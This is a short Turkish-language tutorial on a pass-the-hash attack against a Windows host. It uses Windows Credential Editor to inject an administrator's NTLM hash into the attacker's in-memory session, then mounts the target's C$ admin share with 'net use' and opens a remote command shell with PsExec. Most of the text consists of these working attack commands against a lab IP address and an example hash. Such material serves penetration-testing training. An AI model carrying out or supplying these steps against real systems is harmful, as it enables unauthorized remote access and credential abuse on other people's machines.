Varsayılan durumda bir bilgisayarın komut satırına uzaktan erişim sağlayabilmek için o bilgisayara ait bir yönetici hesabının kimlik bilgileri gerekmektedir. Aksi halde erişim yetki hatası alınacaktır.
Bu bilgisayarda yönetici olan hesabın adının Vedat, Vedat kullanıcısının parola özetinin ise AAD3B435B51404EEAAD3B435B51404EE:FA320A5CF3D53B4E74BBAC73047186F2 olduğunu varsayalım. Bu bilgilerle, hedef sistemin komut satırına erişim sağlamak için WCE aracı kullanılacaktır.
WCE aracının “-s” seçeneği ile, RAM üzerinde bulunan oturumun NTLM kimlik bilgileri değiştirilebilir. Normalde RAM üzerinde Saldirgan adlı hesabın parolasının açık hali ve özet hali bulunmaktadır:
wce -l
wce -w
WCE aracı ile RAM üzerindeki oturuma ait NTLM bilgileri Vedat hesabına ait kimlik bilgileri (Kullanıcı adı ve parola özeti) ile değiştirilebilir. WCE aracı “-s” seçeneği ile çalıştırıldıktan sonra, Saldirgan hesabına ait parolanın NTLM özet bilgilerinin, Vedat’ın parolasına ait NTLM özet bilgileri ile değiştiği görülmektedir. Bunun yanında parolanın açık halinin değişmediği de görülmektedir.
wce -s WORKGROUP:Vedat:AAD3B435B51404EEAAD3B435B51404EE:FA320A5CF3D53B4E74BBAC73047186F2
wce -l
wce -w
Hedef sistemin paylaşılan kaynaklarına (yönetimsel paylaşımına) erişim sağlayabilmek için, öncelikle bağlantının kurulması gerekmektedir.
net use \\172.16.67.202\C$ /USER:WORKGROUP\Vedat
net use
Bağlantı kurulduktan sonra, hedef sistemin komut satırına Vedat hesabının hakları ile erişim sağlanabildiği görülmektedir.
whoami
hostname
PsExec.exe \\172.16.67.202 cmd -accepteula
whoami
hostname